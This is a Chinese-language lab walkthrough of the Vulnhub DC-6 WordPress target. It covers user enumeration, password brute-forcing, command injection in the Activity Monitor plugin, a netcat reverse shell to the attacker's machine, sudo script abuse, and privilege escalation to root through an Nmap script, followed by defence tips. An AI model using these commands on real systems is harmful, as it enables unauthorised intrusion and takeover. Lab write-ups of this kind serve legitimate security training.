Vulnhub靶机渗透测试之DC-6-wordpress+nmap提权
字数 1392 2025-08-15 21:33:30
Vulnhub靶机DC-6渗透测试教学文档
靶机概述
DC-6是Vulnhub平台提供的一个WordPress靶机环境,主要考察以下技术点:
- WordPress网站渗透
- WPScan工具使用
- Activity Monitor插件漏洞利用
- 用户水平越权
- Nmap提权技术
环境准备
靶机下载与部署
- 从Vulnhub官网下载DC-6靶机:https://download.vulnhub.com/dc/DC-6.zip
- 解压后得到.ova文件,使用VMware或VirtualBox导入
- 建议对导入的虚拟机创建快照
网络配置
- 攻击机(Kali Linux): 192.168.2.19
- 靶机(DC-6): 192.168.2.25
- 网络模式: 桥接模式
必要配置
在攻击机上修改hosts文件:
sudo vim /etc/hosts
添加以下内容:
192.168.2.25 wordy
信息收集阶段
端口扫描
使用nmap进行基础扫描:
nmap -sV 192.168.2.25
发现开放端口:
- 22/tcp - SSH
- 80/tcp - HTTP (WordPress)
WordPress信息收集
使用WPScan进行初步扫描:
wpscan --url http://wordy/ --enumerate u
发现5个用户名:
- admin
- mark
- graham
- sarah
- jens
密码爆破
准备字典
- 创建用户名字典文件:
vim dc-username.txt
内容:
admin
mark
graham
sarah
jens
- 准备密码字典:
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6-passwd.txt
执行爆破
wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt
成功爆破出mark用户的密码:helpdesk01
WordPress后台渗透
登录后台
使用mark/helpdesk01登录WordPress后台
Activity Monitor插件漏洞利用
-
访问Activity Monitor -> Tools
-
执行命令时使用Burp Suite拦截请求
-
前端限制15字符,可通过F12修改HTML解除限制
-
设置反弹shell:
- Kali监听:
nc -lvvp 4444 - Burp修改请求为:
nc 192.168.2.19 4444 -e /bin/bash
- Kali监听:
-
获取稳定shell:
python -c 'import pty;pty.spawn("/bin/bash")'
水平越权
发现其他用户凭据
在mark用户目录下发现graham用户的密码:GSo7isUM1D4
切换用户
su graham
密码:GSo7isUM1D4
权限提升
检查sudo权限
sudo -l
输出显示:
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
分析backups.sh脚本
cat /home/jens/backups.sh
发现这是一个可以以jens用户身份执行的脚本
利用脚本提权
- 修改脚本内容:
echo '/bin/bash' > /home/jens/backups.sh
- 执行脚本:
sudo -u jens /home/jens/backups.sh
现在获得jens用户的shell
检查jens的sudo权限
sudo -l
发现jens可以以root身份执行nmap
Nmap提权
- 创建nmap脚本:
echo 'os.execute("/bin/bash")' > shell
- 执行提权:
sudo nmap --script=shell
成功获得root权限
关键知识点总结
-
信息收集:
- 主机发现与端口扫描
- WordPress用户枚举
- 敏感文件发现
-
WPScan工具使用:
- 用户名枚举
- 密码爆破
- 漏洞扫描
-
WordPress插件漏洞:
- Activity Monitor插件的RCE漏洞
- 前端限制绕过
- 反弹shell技术
-
权限提升技术:
- 水平越权(用户间切换)
- Sudo权限滥用
- Nmap提权技术
-
后渗透技巧:
- 不稳定shell的稳定化
- 权限维持技术
- 敏感信息挖掘
防御建议
-
WordPress安全措施:
- 使用强密码策略
- 限制登录尝试次数
- 及时更新插件和核心
-
系统安全配置:
- 合理配置sudo权限
- 限制setuid程序
- 定期审计用户权限
-
网络防护:
- 配置防火墙规则
- 监控异常网络连接
- 实施最小权限原则
通过本靶机的完整渗透过程,可以全面了解从信息收集到最终提权的完整攻击链,以及相应的防御策略。